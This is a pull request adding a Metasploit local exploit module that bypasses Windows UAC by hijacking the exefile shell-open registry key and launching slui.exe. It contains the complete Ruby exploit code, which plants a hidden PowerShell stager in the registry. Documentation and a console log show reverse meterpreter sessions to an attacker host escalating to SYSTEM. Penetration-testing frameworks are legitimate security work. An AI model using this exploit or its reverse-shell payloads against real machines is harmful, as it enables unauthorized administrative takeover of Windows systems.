### PR TITLE
Slui File Handler Hijack LPE

### DIFF
--- a/documentation/modules/exploit/windows/local/bypassuac_sluihijack.md
+++ b/documentation/modules/exploit/windows/local/bypassuac_sluihijack.md
@@ -1,0 +1,140 @@
+## Intro
+
+  This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
+  the Current User hive, and inserting a custom command that will get invoked when
+  any binary (.exe) application is launched. But slui.exe is an auto-elevated binary that is
+  vulnerable to file handler hijacking. When we run slui.exe with changed Registry key
+  (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
+  instead of slui.exe.
+
+  The module modifies the registry in order for this exploit to work. The modification is
+  reverted once the exploitation attempt has finished.
+	
+  The module does not require the architecture of the payload to match the OS. If
+  specifying EXE::Custom your DLL should call ExitProcess() after starting the
+  payload in a different process.
+
+## Usage
+	
+  1. First we need to obtain a session on the target system.
+  2. Load module: `use exploit/windows/local/bypassuac_sluihijack`
+  3. Set the `payload`: `set payload windows/x64/meterpreter/reverse_tcp`
+  4. If an existing handler is configured to receive the elevated session,
+  then the module's handler should be disabled: `set DisablePayloadHandler true`.
+  5. Configure the `payload`.
+  6. `Exploit` it.
+
+## Scenario
+
+```
+msf exploit(multi/handler) > 
+[*] https://192.168.0.30:443 handling request from 192.168.0.33; (UUID: d4iywkip) Encoded stage with x86/shikata_ga_nai
+[*] https://192.168.0.30:443 handling request from 192.168.0.33; (UUID: d4iywkip) Staging x86 payload (180854 bytes) ...
+[*] Meterpreter session 1 opened (192.168.0.30:443 -> 192.168.0.33:49875) at 2018-04-07 18:33:11 +0200
+
+msf exploit(multi/handler) > sessions 
+
+Active sessions
+===============
+
+  Id  Name  Type                     Information                 Connection
+  --  ----  ----                     -----------                 ----------
+  1         meterpreter x86/windows  WIN10-01\user01 @ WIN10-01  192.168.0.30:443 -> 192.168.0.33:49875 (192.168.0.33)
+
+msf exploit(multi/handler) > sessions 1
+[*] Starting interaction with 1...
+
+meterpreter > sysinfo 
+Computer        : WIN10-01
+OS              : Windows 10 (Build 16299).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter > getuid 
+Server username: WIN10-01\user01
+meterpreter > getprivs 
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeChangeNotifyPrivilege
+SeIncreaseWorkingSetPrivilege
+SeShutdownPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > background 
+[*] Backgrounding session 1...
+msf exploit(multi/handler) > use exploit/windows/local/bypassuac_sluihijack
+msf exploit(windows/local/bypassuac_sluihijack) > show targets 
+
+Exploit targets:
+
+   Id  Name
+   --  ----
+   0   Windows x86
+   1   Windows x64
+
+
+msf exploit(windows/local/bypassuac_sluihijack) > set target 1
+target => 1
+msf exploit(windows/local/bypassuac_sluihijack) > set payload windows/x64/meterpreter/reverse_https
+payload => windows/x64/meterpreter/reverse_https
+msf exploit(windows/local/bypassuac_sluihijack) > set session 1
+session => 1
+msf exploit(windows/local/bypassuac_sluihijack) > set LHOST 192.168.0.30
+LHOST => 192.168.0.30
+msf exploit(windows/local/bypassuac_sluihijack) > exploit 
+
+[*] Started HTTPS reverse handler on https://192.168.0.30:8443
+[*] UAC is Enabled, checking level...
+[+] Part of Administrators group! Continuing...
+[+] UAC is set to Default
+[+] BypassUAC can bypass this setting, continuing...
+[*] Configuring payload and stager registry keys ...
+[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c powershell Start-Process C:\Windows\System32\slui.exe -Verb runas
+[*] https://192.168.0.30:8443 handling request from 192.168.0.33; (UUID: znqja6ua) Staging x64 payload (207449 bytes) ...
+[*] Meterpreter session 2 opened (192.168.0.30:8443 -> 192.168.0.33:49881) at 2018-04-07 18:34:39 +0200
+[*] Cleaining up registry keys ...
+
+meterpreter > getprivs 
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeBackupPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeCreatePagefilePrivilege
+SeCreateSymbolicLinkPrivilege
+SeDebugPrivilege
+SeImpersonatePrivilege
+SeIncreaseBasePriorityPrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+SeLoadDriverPrivilege
+SeManageVolumePrivilege
+SeProfileSingleProcessPrivilege
+SeRemoteShutdownPrivilege
+SeRestorePrivilege
+SeSecurityPrivilege
+SeShutdownPrivilege
+SeSystemEnvironmentPrivilege
+SeSystemProfilePrivilege
+SeSystemtimePrivilege
+SeTakeOwnershipPrivilege
+SeTimeZonePrivilege
+SeUndockPrivilege
+
+meterpreter > getsystem 
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid 
+Server username: NT AUTHORITY\SYSTEM
+meterpreter >
+```

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
-    payload_value = rand_text_alpha(12)
+    payload_value = rand_text_alpha(8)
     psh_path = expand_path(psh_path)
 
     template_path = Rex::Powershell::Templates::TEMPLATE_DIR

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -28,14 +28,17 @@ class MetasploitModule < Msf::Exploit::Local
         info,
         'Name'          => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
         'Description'   => %q{
-          slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
+          This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
+          the Current User hive, and inserting a custom command that will get invoked when any binary (.exe)
+          application is launched. But slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
+          When we run slui.exe with changed Registry key (HKCU:\Software\Classes\exefile\shell\open\command),
+          it will run our custom command as Admin instead of slui.exe.
 
-          Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
-          Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
+          The module modifies the registry in order for this exploit to work. The modification is reverted
+          once the exploitation attempt has finished.
 
-          This exploit is generally independent from programming language and bitness, as no DLL injection or
-          privileged file copy is needed. In addition, if default system binaries suffice, file drops can be
-          avoided altogether.
+          The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom
+          your DLL should call ExitProcess() after starting the payload in a different process.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -29,16 +29,18 @@ class MetasploitModule < Msf::Exploit::Local
         'Name'          => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
         'Description'   => %q{
           This module will bypass UAC on Windows 8-10 by hijacking a special key in the Registry under
-          the Current User hive, and inserting a custom command that will get invoked when any binary (.exe)
-          application is launched. But slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
-          When we run slui.exe with changed Registry key (HKCU:\Software\Classes\exefile\shell\open\command),
-          it will run our custom command as Admin instead of slui.exe.
+          the Current User hive, and inserting a custom command that will get invoked when any binary
+          (.exe) application is launched. But slui.exe is an auto-elevated binary that is vulnerable
+          to file handler hijacking. When we run slui.exe with changed Registry key
+          (HKCU:\Software\Classes\exefile\shell\open\command), it will run our custom command as Admin
+          instead of slui.exe.
 
-          The module modifies the registry in order for this exploit to work. The modification is reverted
-          once the exploitation attempt has finished.
+          The module modifies the registry in order for this exploit to work. The modification is
+          reverted once the exploitation attempt has finished.
 
-          The module does not require the architecture of the payload to match the OS. If specifying EXE::Custom
-          your DLL should call ExitProcess() after starting the payload in a different process.
+          The module does not require the architecture of the payload to match the OS. If
+          specifying EXE::Custom your DLL should call ExitProcess() after starting the
+          payload in a different process.
         },
         'License'       => MSF_LICENSE,
         'Author'        => [

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -1,0 +1,206 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Exploit::Powershell
+  include Post::Windows::Priv
+  include Post::Windows::Registry
+  include Post::Windows::Runas
+
+  FODHELPER_DEL_KEY     = "HKCU\\Software\\Classes\\exefile".freeze
+  FODHELPER_WRITE_KEY   = "HKCU\\Software\\Classes\\exefile\\shell\\open\\command".freeze
+  EXEC_REG_DELEGATE_VAL = 'DelegateExecute'.freeze
+  EXEC_REG_VAL          = ''.freeze # This maps to "(Default)"
+  EXEC_REG_VAL_TYPE     = 'REG_SZ'.freeze
+  FODHELPER_PATH        = "%WINDIR%\\System32\\slui.exe".freeze
+  CMD_MAX_LEN           = 16383
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'          => 'Windows UAC Protection Bypass (Via Slui File Handler Hijack)',
+        'Description'   => %q{
+          slui.exe is an auto-elevated binary that is vulnerable to file handler hijacking.
+
+          Read access to HKCU\Software\Classes\exefile\shell\open is performed upon execution.
+          Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
+
+          This exploit is generally independent from programming language and bitness, as no DLL injection or
+          privileged file copy is needed. In addition, if default system binaries suffice, file drops can be 
+          avoided altogether.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+          'bytecode-77', # UAC bypass discovery and research
+          'gushmazuko', # MSF & PowerShell module
+        ],
+        'Platform'      => ['win'],
+        'SessionTypes'  => ['meterpreter'],
+        'Targets'       => [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
+        ],
+        'DefaultTarget' => 0,
+        'References'    => [
+          [
+            'URL', 'https://github.com/bytecode-77/slui-file-handler-hijack-privilege-escalation',
+            'URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1'
+          ]
+        ],
+        'DisclosureDate' => 'January 15 2018'
+      )
+    )
+  end
+
+  def check
+    if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    commspec = 'powershell'
+    registry_view = REGISTRY_VIEW_NATIVE
+    psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
+
+    # Make sure we have a sane payload configuration
+    if sysinfo['Architecture'] == ARCH_X64
+      if session.arch == ARCH_X86
+        # On x64, check arch
+        commspec = '%WINDIR%\\Sysnative\\cmd.exe /c powershell'
+        if target_arch.first == ARCH_X64
+          # We can't use absolute path here as
+          # %WINDIR%\\System32 is always converted into %WINDIR%\\SysWOW64 from a x86 session
+          psh_path = "powershell.exe"
+        end
+      end
+      if target_arch.first == ARCH_X86
+        # Invoking x86, so switch to SysWOW64
+        psh_path = "%WINDIR%\\SysWOW64\\WindowsPowershell\\v1.0\\powershell.exe"
+      end
+    else
+      # if we're on x86, we can't handle x64 payloads
+      if target_arch.first == ARCH_X64
+        fail_with(Failure::BadConfig, 'x64 Target Selected for x86 System')
+      end
+    end
+
+    if !payload.arch.empty? && (payload.arch.first != target_arch.first)
+      fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
+    end
+
+    # Validate that we can actually do things before we bother
+    # doing any more work
+    check_permissions!
+
+    case get_uac_level
+    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
+      UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT
+      fail_with(Failure::NotVulnerable,
+                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")
+    when UAC_DEFAULT
+      print_good('UAC is set to Default')
+      print_good('BypassUAC can bypass this setting, continuing...')
+    when UAC_NO_PROMPT
+      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')
+      shell_execute_exe
+      return
+    end
+
+    payload_value = rand_text_alpha(8)
+    psh_path = expand_path(psh_path)
+
+    template_path = Rex::Powershell::Templates::TEMPLATE_DIR
+    psh_payload = Rex::Powershell::Payload.to_win32pe_psh_net(template_path, payload.encoded)
+
+    if psh_payload.length > CMD_MAX_LEN
+      fail_with(Failure::None, "Payload size should be smaller then #{CMD_MAX_LEN} (actual size: #{psh_payload.length})")
+    end
+
+    psh_stager = "\"IEX (Get-ItemProperty -Path #{FODHELPER_WRITE_KEY.gsub('HKCU', 'HKCU:')} -Name #{payload_value}).#{payload_value}\""
+    cmd = "#{psh_path} -nop -w hidden -c #{psh_stager}"
+
+    existing = registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, registry_view) || ""
+    exist_delegate = !registry_getvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view).nil?
+
+    if existing.empty?
+      registry_createkey(FODHELPER_WRITE_KEY, registry_view)
+    end
+
+    print_status("Configuring payload and stager registry keys ...")
+    unless exist_delegate
+      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, '', EXEC_REG_VAL_TYPE, registry_view)
+    end
+
+    registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, cmd, EXEC_REG_VAL_TYPE, registry_view)
+    registry_setvaldata(FODHELPER_WRITE_KEY, payload_value, psh_payload, EXEC_REG_VAL_TYPE, registry_view)
+
+    # Calling slui.exe through cmd.exe allow us to launch it from either x86 or x64 session arch.
+    cmd_path = expand_path(commspec)
+    cmd_args = expand_path("Start-Process #{FODHELPER_PATH} -Verb runas")
+    print_status("Executing payload: #{cmd_path} #{cmd_args}")
+
+    # We can't use cmd_exec here because it blocks, waiting for a result.
+    client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
+
+    # Wait a copule of seconds to give the payload a chance to fire before cleaning up
+    # TODO: fix this up to use something smarter than a timeout?
+    Rex::sleep(3)
+
+    handler(client)
+
+    print_status("Cleaining up registry keys ...")
+    unless exist_delegate
+      registry_deleteval(FODHELPER_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
+    end
+    if existing.empty?
+      registry_deletekey(FODHELPER_DEL_KEY, registry_view)
+    else
+      registry_setvaldata(FODHELPER_WRITE_KEY, EXEC_REG_VAL, existing, EXEC_REG_VAL_TYPE, registry_view)
+    end
+    registry_deleteval(FODHELPER_WRITE_KEY, payload_value, registry_view)
+  end
+
+  def check_permissions!
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+
+    # Check if you are an admin
+    vprint_status('Checking admin status...')
+    admin_group = is_in_admin_group?
+
+    unless check == Exploit::CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+
+    unless is_in_admin_group?
+      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+    end
+
+    print_status('UAC is Enabled, checking level...')
+    if admin_group.nil?
+      print_error('Either whoami is not there or failed to execute')
+      print_error('Continuing under assumption you already checked...')
+    else
+      if admin_group
+        print_good('Part of Administrators group! Continuing...')
+      else
+        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
+      end
+    end
+
+    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')
+    end
+  end
+end

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Local
           Due to the registry key being accessible from user mode, an arbitrary executable file can be injected.
 
           This exploit is generally independent from programming language and bitness, as no DLL injection or
-          privileged file copy is needed. In addition, if default system binaries suffice, file drops can be 
+          privileged file copy is needed. In addition, if default system binaries suffice, file drops can be
           avoided altogether.
         },
         'License'       => MSF_LICENSE,
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local
             'URL', 'https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1'
           ]
         ],
-        'DisclosureDate' => 'January 15 2018'
+        'DisclosureDate' => 'Jan 15 2018'
       )
     )
   end
@@ -118,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Local
       return
     end
 
-    payload_value = rand_text_alpha(8)
+    payload_value = rand_text_alpha(12)
     psh_path = expand_path(psh_path)
 
     template_path = Rex::Powershell::Templates::TEMPLATE_DIR

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -178,20 +178,20 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check_permissions!
-    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
 
+    unless check == CheckCode::Appears
+      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
+    end
+    
     # Check if you are an admin
     vprint_status('Checking admin status...')
     admin_group = is_in_admin_group?
-
-    unless check == Exploit::CheckCode::Appears
-      fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
-    end
-
     unless is_in_admin_group?
       fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
     end
 
+    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
+    
     print_status('UAC is Enabled, checking level...')
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Local
     unless check == CheckCode::Appears
       fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
     end
-    
+
     # Check if you are an admin
     vprint_status('Checking admin status...')
     admin_group = is_in_admin_group?
@@ -191,7 +191,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
-    
+
     print_status('UAC is Enabled, checking level...')
     if admin_group.nil?
       print_error('Either whoami is not there or failed to execute')

--- a/modules/exploits/windows/local/bypassuac_sluihijack.rb
+++ b/modules/exploits/windows/local/bypassuac_sluihijack.rb
@@ -67,9 +67,9 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     if sysinfo['OS'] =~ /Windows (8|10)/ && is_uac_enabled?
-      Exploit::CheckCode::Appears
+      CheckCode::Appears
     else
-      Exploit::CheckCode::Safe
+      CheckCode::Safe
     end
   end
 
@@ -165,7 +165,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     handler(client)
 
-    print_status("Cleaining up registry keys ...")
+    print_status("Cleaining ...")
     unless exist_delegate
       registry_deleteval(SLUI_WRITE_KEY, EXEC_REG_DELEGATE_VAL, registry_view)
     end


### PR DESCRIPTION
Slui File Handler Hijack LPE - MSF Module
UAC Bypass | Local Privilege Escalation Via Slui Hijack


I have added a new module for bypass UAC.

## Verification Steps

1. `wget https://github.com/gushmazuko/WinBypass/blob/master/bypassuac_sluihijack.rb`
2. `cp bypassuac_sluihijack.rb ~/.msf4/modules/exploits/windows/local/`
3. `msfconsole`
4. `reload_all`
5. `use exploit/windows/local/bypassuac_sluihijack`
6. `set payload windows/meterpreter/reverse_https`
7. `set rhost <ip>`
8. `set rport <port>`
9. `set session <number>`
10. `exploit`


